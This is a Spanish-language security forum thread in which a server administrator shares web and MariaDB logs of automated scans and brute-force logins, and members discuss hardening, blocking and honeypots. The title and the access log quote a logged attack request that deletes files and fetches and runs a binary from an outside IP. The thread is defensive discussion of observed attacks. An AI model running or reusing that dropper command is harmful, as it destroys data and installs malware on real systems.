Foro de elhacker.net

Seguridad Informática => Nivel Web => Mensaje iniciado por: el-brujo en 19 Diciembre 2020, 12:43 pm



Título: GET /shell?cd+/tmp;rm+-rf+*;wget+185.172.111.214/bins/UnHAnaAW.x86
Publicado por: el-brujo en 19 Diciembre 2020, 12:43 pm
Instalo un servidor web nuevo sin contenido, ni nada y a los pocos minutos ya recibo peticiones maliciosas xD

Citar
85.93.182.254 - - [14/Dec/2020:12:55:09 +0100] "GET /index.php?s=/index/ hink" 400 226 "-" "-"
68.150.109.112 - - [14/Dec/2020:12:58:24 +0100] "GET /shell?cd+/tmp;rm+-rf+*;wget+185.172.111.214/bins/UnHAnaAW.x86;chmod+777+/tmp/UnHAnaAW.x86;sh+/tmp/UnHAnaAW.x86+w00dy.jaws HTTP/1.1" 404 196 "-" "Hello, world"
200.160.123.172 - - [14/Dec/2020:12:59:19 +0100] "GET /index.php?s=/index/ hink" 400 226 "-" "-"
192.241.236.61 - - [14/Dec/2020:13:13:59 +0100] "GET / HTTP/1.1" 200 481 "-" "Mozilla/5.0 zgrab/0.x"
207.180.140.98 - - [14/Dec/2020:13:29:51 +0100] "GET /index.php?s=/index/ hink" 400 226 "-" "-"
192.241.237.198 - - [14/Dec/2020:13:34:45 +0100] "\x16\x03\x01" 400 226 "-" "-"
151.233.51.20 - - [14/Dec/2020:13:39:55 +0100] "GET /index.php?s=/index/ hink" 400 226 "-" "-"
123.115.60.33 - - [14/Dec/2020:13:55:26 +0100] "GET /index.php?s=/index/ hink" 400 226 "-" "-"
123.115.60.33 - - [14/Dec/2020:13:55:27 +0100] "GET /index.php?s=/index/ hink" 400 226 "-" "-"
192.241.238.100 - - [14/Dec/2020:13:56:04 +0100] "\x16\x03\x01" 400 226 "-" "-"
94.102.59.99 - - [14/Dec/2020:14:00:20 +0100] "GET /index.php?s=/index/ hink" 400 226 "-" "-"
222.117.123.238 - - [14/Dec/2020:14:13:16 +0100] "GET /index.php?s=/index/ hink" 400 226 "-" "-"
220.81.245.117 - - [14/Dec/2020:15:23:00 +0100] "GET /index.php?s=/index/ hink" 400 226 "-" "-"
172.69.33.42 - - [14/Dec/2020:15:57:06 +0100] "\x16\x03\x01" 400 226 "-" "-"
172.69.33.42 - - [14/Dec/2020:15:57:59 +0100] "\x16\x03\x01" 400 226 "-" "-"
108.162.215.115 - - [14/Dec/2020:15:59:00 +0100] "\x16\x03\x01" 400 226 "-" "-"
108.162.215.115 - - [14/Dec/2020:15:59:26 +0100] "\x16\x03\x01" 400 226 "-" "-"
162.158.255.59 - - [14/Dec/2020:15:59:29 +0100] "\x16\x03\x01" 400 226 "-" "-"
172.69.35.46 - - [14/Dec/2020:15:59:29 +0100] "\x16\x03\x01" 400 226 "-" "-"
162.158.255.59 - - [14/Dec/2020:16:01:35 +0100] "\x16\x03\x01" 400 226 "-" "-"
162.158.255.59 - - [14/Dec/2020:16:02:24 +0100] "\x16\x03\x01" 400 226 "-" "-"
162.158.166.112 - - [14/Dec/2020:16:03:22 +0100] "\x16\x03\x01" 400 226 "-" "-"
162.158.166.112 - - [14/Dec/2020:16:05:27 +0100] "\x16\x03\x01" 400 226 "-" "-"
172.69.135.89 - - [14/Dec/2020:16:06:05 +0100] "\x16\x03\x01" 400 226 "-" "-"
172.69.135.89 - - [14/Dec/2020:16:06:10 +0100] "\x16\x03\x01\x02" 400 226 "-" "-"
172.69.135.89 - - [14/Dec/2020:16:06:11 +0100] "\x16\x03\x01\x02" 400 226 "-" "-"
172.69.135.89 - - [14/Dec/2020:16:06:43 +0100] "\x16\x03\x01" 400 226 "-" "-"
162.158.166.52 - - [14/Dec/2020:16:07:44 +0100] "\x16\x03\x01" 400 226 "-" "-"
172.69.34.229 - - [14/Dec/2020:16:08:41 +0100] "\x16\x03\x01" 400 226 "-" "-"
165.227.4.106 - - [14/Dec/2020:16:10:34 +0100] "GET / HTTP/1.0" 200 481 "-" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)"
2.57.122.212 - - [14/Dec/2020:16:14:03 +0100] "GET /index.php?s=/index/ hink" 400 226 "-" "-"


Creo que será interesante publicar el  log de mod_security del servidor web para ver la cantidad inhumana de peticiones.


Título: Re: GET /shell?cd+/tmp;rm+-rf+*;wget+185.172.111.214/bins/UnHAnaAW.x86
Publicado por: BloodSharp en 19 Diciembre 2020, 13:24 pm
Instalo un servidor web nuevo sin contenido, ni nada y a los pocos minutos ya recibo peticiones maliciosas xD

Ya tan rápido te metieron una shell? Debe ser por Shodan, ZoomEye y otras escaneres alternativos...


B#


Título: Re: GET /shell?cd+/tmp;rm+-rf+*;wget+185.172.111.214/bins/UnHAnaAW.x86
Publicado por: @XSStringManolo en 19 Diciembre 2020, 17:12 pm
Pasa bastante tiempo entre peticiones y cambia la ip. Es manual?


Título: Re: GET /shell?cd+/tmp;rm+-rf+*;wget+185.172.111.214/bins/UnHAnaAW.x86
Publicado por: #!drvy en 19 Diciembre 2020, 17:22 pm
Esto es más que común. Son escaners automatizados que se dedican a probar vulnerabilidades conocidas. Pasa lo mismo por SSH... nada más levantes un servidor (asignarle IP) ya tienes intentos de login.

Saludos


Título: Re: GET /shell?cd+/tmp;rm+-rf+*;wget+185.172.111.214/bins/UnHAnaAW.x86
Publicado por: @XSStringManolo en 19 Diciembre 2020, 17:49 pm
Me pasaba mucho con una red en concreto, pero por lo general en servidores no me llegan peticiones por el estilo.


Título: Re: GET /shell?cd+/tmp;rm+-rf+*;wget+185.172.111.214/bins/UnHAnaAW.x86
Publicado por: el-brujo en 19 Diciembre 2020, 20:44 pm
Esto es más que común. Son escaners automatizados que se dedican a probar vulnerabilidades conocidas. Pasa lo mismo por SSH... nada más levantes un servidor (asignarle IP) ya tienes intentos de login.

Saludos

Eso mismo creo yo, son automatizados en busca de nuevas víctimas...

Ya, el Fail2ban no para de trabajar con SSH. Los intentos fallidos de conexión por SSH son todavía más escandalosos... Me parece que llevaba 143 en pocos días.

Un día me dió por mirar las estadísticas de wp-login.php de un WordPress y la cantidad de intentos de entrar era también alarmante. Sobretodo alguna ip que hacía cada día miles de intentos xD


Título: Re: GET /shell?cd+/tmp;rm+-rf+*;wget+185.172.111.214/bins/UnHAnaAW.x86
Publicado por: el-brujo en 6 Enero 2021, 13:09 pm
Por defecto es un error aceptar conexiones mysql externas.

Durante unas horas se me olvidó añadir el skip-networking del my.cnf de MariaDB (MySQL)

Código:
2020-12-15 11:38:41 2070 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:41 2071 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:41 2072 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:42 2073 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:42 2074 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:42 2075 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:43 2076 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:43 2077 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:44 2078 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:44 2079 [Warning] Access denied for user 'mcUser'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:45 2080 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:45 2081 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:45 2082 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:46 2083 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:46 2084 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:46 2085 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:47 2086 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:47 2087 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:48 2088 [Warning] Access denied for user 'admin'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:48 2089 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:48 2090 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:49 2091 [Warning] Access denied for user 'mcUser'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:49 2092 [Warning] Access denied for user 'admin'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:50 2093 [Warning] Access denied for user 'admin'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:50 2094 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:50 2095 [Warning] Access denied for user 'mcUser'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:51 2096 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:51 2097 [Warning] Access denied for user 'admin'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:52 2098 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:52 2099 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:52 2100 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:53 2101 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:53 2102 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:54 2103 [Warning] Access denied for user 'admin'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:54 2104 [Warning] Access denied for user 'admin'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:54 2105 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:55 2106 [Warning] Access denied for user 'admin'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:55 2107 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:56 2108 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:56 2109 [Warning] Access denied for user 'moves'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:56 2110 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:57 2111 [Warning] Access denied for user 'admin'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:57 2112 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:57 2113 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:58 2114 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:58 2115 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:59 2116 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:59 2117 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:59 2118 [Warning] Access denied for user 'admin'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:00 2119 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:00 2120 [Warning] Access denied for user 'admin'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:01 2122 [Warning] Access denied for user 'admin'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:01 2123 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:01 2124 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:02 2125 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:02 2126 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:03 2127 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:03 2128 [Warning] Access denied for user 'admin'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:03 2129 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:04 2130 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:04 2131 [Warning] Access denied for user 'admin'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:04 2132 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:05 2133 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:05 2134 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:06 2135 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:06 2136 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:06 2137 [Warning] Access denied for user 'cloudera'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:07 2138 [Warning] Access denied for user 'admin'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:07 2139 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:08 2140 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:08 2141 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: NO)
2020-12-15 11:39:08 2142 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:09 2143 [Warning] Access denied for user 'admin'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:09 2144 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:10 2145 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:10 2146 [Warning] Access denied for user 'admin'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:10 2147 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:11 2148 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:11 2149 [Warning] Access denied for user 'admin'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:11 2150 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:12 2151 [Warning] Access denied for user 'admin'@'66.128.254.69' (using password: NO)
2020-12-15 11:39:12 2152 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:13 2153 [Warning] Access denied for user 'admin'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:13 2154 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:13 2155 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:14 2156 [Warning] Access denied for user 'cloudera'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:14 2157 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:14 2158 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:15 2159 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:15 2160 [Warning] Access denied for user 'admin'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:16 2161 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:16 2162 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:16 2163 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:17 2164 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:17 2165 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:18 2166 [Warning] Access denied for user 'admin'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:18 2167 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:18 2168 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:19 2169 [Warning] Access denied for user 'admin'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:19 2170 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:19 2171 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:20 2172 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:20 2173 [Warning] Access denied for user 'admin'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:21 2174 [Warning] Access denied for user 'admin'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:21 2175 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:21 2176 [Warning] Access denied for user 'admin'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:22 2177 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:22 2178 [Warning] Access denied for user 'admin'@'66.128.254.69' (using password: NO)
2020-12-15 11:39:22 2179 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 12:42:01 2297 [Warning] Hostname 'zg-0915b-171.stretchoid.com' does not resolve to '192.241.238.9'.
2020-12-15 12:42:01 2297 [Note] Hostname 'zg-0915b-171.stretchoid.com' has the following IP addresses:
2020-12-15 12:42:01 2297 [Note]  - 91.126.217.153
2020-12-15 14:12:35 2444 [Warning] IP address '42.192.225.22' could not be resolved: Name or service not known
2020-12-15 14:12:35 2444 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:12:36 2445 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:12:37 2446 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:12:37 2447 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:12:38 2448 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:12:39 2449 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:12:43 2450 [Warning] Access denied for user 'admin'@'42.192.225.22' (using password: YES)
2020-12-15 14:12:45 2451 [Warning] Access denied for user 'admin'@'42.192.225.22' (using password: YES)
2020-12-15 14:12:45 2452 [Warning] Access denied for user 'mysql'@'42.192.225.22' (using password: YES)
2020-12-15 14:12:47 2453 [Warning] Access denied for user 'mysql'@'42.192.225.22' (using password: YES)
2020-12-15 14:12:49 2454 [Warning] Access denied for user 'admin'@'42.192.225.22' (using password: YES)
2020-12-15 14:12:52 2455 [Warning] Access denied for user 'test'@'42.192.225.22' (using password: YES)
2020-12-15 14:12:54 2456 [Warning] Access denied for user 'test'@'42.192.225.22' (using password: YES)
2020-12-15 14:13:02 2457 [Warning] Access denied for user 'user'@'42.192.225.22' (using password: YES)
2020-12-15 14:13:04 2459 [Warning] Access denied for user 'user'@'42.192.225.22' (using password: YES)
2020-12-15 14:13:05 2460 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:13:07 2461 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:13:08 2462 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:13:11 2463 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:13:11 2464 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:13:14 2465 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:13:15 2466 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:13:16 2467 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:13:17 2468 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:13:17 2469 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:13:18 2470 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:13:19 2471 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:13:20 2472 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:13:20 2473 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:13:23 2474 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:13:23 2475 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:13:26 2476 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:13:27 2477 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:13:27 2478 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:13:28 2479 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:13:31 2480 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:13:32 2481 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:13:33 2482 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:13:34 2483 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:13:35 2484 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:13:36 2485 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:13:38 2486 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:13:38 2487 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:13:39 2488 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:13:42 2489 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:13:44 2490 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:13:45 2491 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:13:46 2492 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:13:52 2493 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:13:55 2494 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:13:57 2495 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:13:58 2496 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:14:00 2498 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:14:01 2499 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:14:02 2500 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:14:05 2501 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:14:05 2502 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:14:06 2503 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:14:08 2504 [Warning] Access denied for user 'user1'@'42.192.225.22' (using password: YES)
2020-12-15 14:14:10 2505 [Warning] Access denied for user 'user1'@'42.192.225.22' (using password: YES)
2020-12-15 14:14:11 2506 [Warning] Access denied for user 'test1'@'42.192.225.22' (using password: YES)
2020-12-15 14:14:12 2507 [Warning] Access denied for user 'guest'@'42.192.225.22' (using password: YES)
2020-12-15 14:14:13 2508 [Warning] Access denied for user 'guest'@'42.192.225.22' (using password: YES)
2020-12-15 14:14:14 2509 [Warning] Access denied for user 'guest'@'42.192.225.22' (using password: YES)


Título: Re: GET /shell?cd+/tmp;rm+-rf+*;wget+185.172.111.214/bins/UnHAnaAW.x86
Publicado por: #!drvy en 6 Enero 2021, 13:27 pm
Citar
Durante unas horas se me olvidó añadir el skip-networking del my.cnf de MariaDB (MySQL)

Siempre recomendable después de instalar mysql-server, ejecutar

Código
  1. mysql_secure_installation

Saludos


Título: Re: GET /shell?cd+/tmp;rm+-rf+*;wget+185.172.111.214/bins/UnHAnaAW.x86
Publicado por: Danielㅤ en 6 Enero 2021, 14:11 pm
Hola, con el tema de intentos de login es como dice drvy!, asignas una IP pública y levantas un servidor y ya aparecen los intentos de login, pero a éstos habría que hacerles una trampa bastante interesante e ingeniosa, algo que sirve perfectamente para intentos de login o brute force.

Cuál es el objetivo de la fuerza bruta a un sistema? o que es lo que quieren hacer cuando intentan loguearse con algún nombre de usuario del servidor? Es justamente obtener el acceso correcto para ingresar, pero, después de ingresar que es lo que pasa con esos intentos?, simplemente dejan de seguir, dejan de insistir porque obviamente ya consiguieron el acceso.

Lo que se podría hacer es darle ok a todo, cuando un sistema detecta esos intentos, lo que hace es aceptar los login como si fuesen correctos, les hace una trampa y cuando el atacante cree que ya tiene el acceso, simplemente es falso, no lo tiene, pero su sistema automatizado (el del atacante) no sirve para nada, porque todo lo que intente es correcto aunque obviamente son logins falso y no le va a dar acceso de nada, pero de esta forma el atacante queda confundido y se va a dar cuenta de esa medida de seguridad, y que terminara haciendo? abandonando el sitio... lo mismo si es algo automatizado, al aceptar cualquier login ese bot/script se detendrá y los intentos también.

Es un método posiblemente más seguro cuando otros sistemas rechazan todo el tiempo esos miles de login, pero de ésta forma los acepta y los hace creer que tienen acceso cuando en realidad no lo tienen y así no pueden saber cuál es el login correcto, es como los scanners de puertos que pueden hacer creer (que aparezcan abiertos) a los atacantes o sistemas automatizados que x puertos están abiertos cuando verdaderamente están cerrados.


Saludos


Título: Re: GET /shell?cd+/tmp;rm+-rf+*;wget+185.172.111.214/bins/UnHAnaAW.x86
Publicado por: el-brujo en 6 Enero 2021, 14:22 pm
Tienes razón #!drvy  olvidé ejecutar el "secure installation" porque copié parte de la config del servidor migrado.

https://mariadb.com/kb/en/mysql_secure_installation/

No tengo ni la base de datos test, ni user anónimo.

Añadí otras opciones básicas de seguridad en el fichero my.cnf

Código:
#security
local-infile=0
# para poner mysql remoto comentar
skip-networking
#no dns lookups
skip-name-resolve

Citar
Cuál es el objetivo de la fuerza bruta a un sistema? o que es lo que quieren hacer cuando intentan loguearse con algún nombre de usuario del servidor?

Son ataques automáticos y automatizados seguro. Si usas credenciales débiles o por defecto pues ale, entras a formar parte de una botnet o algo peor.


Título: Re: GET /shell?cd+/tmp;rm+-rf+*;wget+185.172.111.214/bins/UnHAnaAW.x86
Publicado por: Danielㅤ en 6 Enero 2021, 15:14 pm
Bien brujo, me alegro que estés mejorando la seguridad del foro ;-)


Saludos


Título: Re: GET /shell?cd+/tmp;rm+-rf+*;wget+185.172.111.214/bins/UnHAnaAW.x86
Publicado por: Xyzed en 7 Enero 2021, 04:46 am
Qué locura, así es en varios proovedores, ni bien levantas un servidor automáticamente te llegan solicitudes raras.
@[D]aniel, a lo que te referís es una especie de honeypot  :rolleyes:


Título: Re: GET /shell?cd+/tmp;rm+-rf+*;wget+185.172.111.214/bins/UnHAnaAW.x86
Publicado por: Danielㅤ en 7 Enero 2021, 13:54 pm
Hay administradores que publican esas IPs maliciosas en PasteBin, ya sea el log del ataque o simplemente las IPs solas y como ya sabrán de la misma forma que uno tiene una IP pública y hay gente que molesta, de la misma forma los van a molestar a ellos.

Otra forma es cargar esas IPs en páginas como (https://www.stopforumspam.com/favicon.ico) StopForumSpam.

Yo alguna vez he creado un script en Python que lee el archivo log de accesos cada x tiempo y si detecta x cantidad de solicitudes en x tiempo, las agrega al archivo .htaccess con deny from IP, también se puede comprobar esas IPs con algunas blacklist haciendo un dns, cuando esos atacantes se dan cuenta que hay un sistema automático que las bloquea por intentos de login o por acciones maliciosas, dejan de molestar, además que no pueden porque IP que prueban va derecho a ser bloqueada.

También es posible usar la API de SFP (pero ésta es limitada)

https://www.stopforumspam.com/usage


Saludos


Título: Re: GET /shell?cd+/tmp;rm+-rf+*;wget+185.172.111.214/bins/UnHAnaAW.x86
Publicado por: Xyzed en 7 Enero 2021, 18:07 pm
Hay administradores que publican esas IPs maliciosas en PasteBin, ya sea el log del ataque o simplemente las IPs solas y como ya sabrán de la misma forma que uno tiene una IP pública y hay gente que molesta, de la misma forma los van a molestar a ellos.

Otra forma es cargar esas IPs en páginas como (https://www.stopforumspam.com/favicon.ico) StopForumSpam.

Yo alguna vez he creado un script en Python que lee el archivo log de accesos cada x tiempo y si detecta x cantidad de solicitudes en x tiempo, las agrega al archivo .htaccess con deny from IP, también se puede comprobar esas IPs con algunas blacklist haciendo un dns, cuando esos atacantes se dan cuenta que hay un sistema automático que las bloquea por intentos de login o por acciones maliciosas, dejan de molestar, además que no pueden porque IP que prueban va derecho a ser bloqueada.

También es posible usar la API de SFP (pero ésta es limitada)

https://www.stopforumspam.com/usage


Saludos
Muy interesante, gracias por la información.


Título: Re: GET /shell?cd+/tmp;rm+-rf+*;wget+185.172.111.214/bins/UnHAnaAW.x86
Publicado por: Danielㅤ en 8 Enero 2021, 19:28 pm
Citar
GET /shell?cd+/tmp;rm+-rf+*;wget+185.172.111.214/bins/UnHAnaAW.x86

Cuándo yo tenía mi foro tenía solicitudes como esas y lo que hacía algunas veces era entrar a esas URL pero desde un script en python nunca del navegador (excepto si usaba view-source:URL) y hasta usaba un proxy anónimo o después cambiaba la IP, cuando entraba en esa dirección guardaba la salida de la descarga en un archivo txt y lo analizaba, algunas veces encontraba código javascript con una redirección a otra URL o a otra IP, pero quería ver el destino, que es lo que realmente quería el atacante que descargue el servidor, y eran script en bash, perl o python, incluso hasta algunos eran en javascript, supongo que javascript para inyectar código malicioso en archivos PHP.

